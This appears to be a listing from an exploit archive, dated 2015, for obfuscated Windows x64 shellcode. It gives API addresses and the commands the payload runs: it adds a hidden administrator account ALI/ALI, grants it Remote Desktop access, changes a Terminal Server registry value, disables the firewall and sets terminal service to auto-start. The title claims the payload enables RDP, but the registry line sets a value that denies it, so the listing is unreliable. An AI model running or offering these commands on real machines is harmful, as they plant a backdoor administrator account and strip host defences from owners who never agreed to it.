Full title: win32/7 x64 ultimate  Add Admin ALI/ALI & Enable RDP Obfuscated Shellcode - 1218 bytes 
Category: shellcode
Platform: win64
#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
#length: 1218 bytes
#Date: 13 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate

WinExec =>  0x769e2c91
ExitProcess =>  0x769679f8
====================================
Execute :
net user ALI ALI /add
net localgroup Administrators ALI /add
NET LOCALGROUP "Remote Desktop Users" ALI /add  
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f 
netsh firewall set opmode disable
sc config termservice start= auto
====================================


# 0day.today @ http://0day.today/